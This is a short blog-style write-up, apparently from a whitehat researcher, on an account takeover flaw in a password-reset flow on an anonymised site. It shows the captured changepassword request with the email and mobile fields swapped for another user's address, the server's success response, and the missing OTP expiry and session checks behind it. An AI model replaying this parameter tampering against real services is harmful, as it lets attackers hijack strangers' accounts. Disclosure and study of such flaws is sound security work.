How can I takeover any account using only their email or mobile number.

Hey guys,

Today i am going to tell you about how can I takeover any account using only their email or mobile number.

Let domain be the (example.com).

“https://www.example.com/content/example/in/en/login/login-page.html”

This is the login page of the example.com .First i created my account and I try Login Bypass but no luck !!.

Then I go with Forgot password mechanism.They sending OTP for resetting the password.I feels like “something phissy”

Then I gone through that forgot password. It asks email id or phone number , I gave email id and hit enter .It sends 4 digit otp after seeing that 4 digit OTP, I thought to bruteforce the otp,but it fails !

After entering the correct OTP ,It redirects to the page which is used to setting the new password.After entering the New password I capture the request made by the website.Request looks like

POST /wsvc/in/changepassword HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
inputVal: ramthewhitehat@gmail.com
callType: email
resetPassword: Hello@1234
otp: 2281
otpId: 1845807
email: ramthewhitehat@gmail.com
mobile: ramthewhitehat@gmail.com
X-Requested-With: XMLHttpRequest
Content-Length: 13
Origin: https://www.example.com
Connection: close
Referer: https://www.example.com/content/example/in/en/login/forgot-password-id.html
Cookie: cookies

loc=IN&lan=en

And I feels like what if i change the “inputval”,”email”,”mobile” values . My father already had the account in that website. so I tried on his account using his email id.

After changing that three values to myfathergmailid@gmail.com,

The response was like

HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Powered-By: Jetty(9.2.9.v20150224)
Access-Control-Allow-Origin: *
Expires: Sun, 08 Dec 2019 16:00:00 GMT
X-UA-Compatible: IE=edge
Content-Length: 141
Date: Sun, 18 Jul 2021 14:08:06 GMT
Connection: close

{“msg”:”Password changed successfully”,”data”:”{\”responseCode\”:\”I\”,\”responseMsg\”:\”Password has changed Successfully\”}”,”status”:200}

It works. There is no OTP expiration and no session validation.

Using this ,I can takeover any of the accounts using by their gmail id or mobile number.

Thanks for reading this !!.

Happy researching….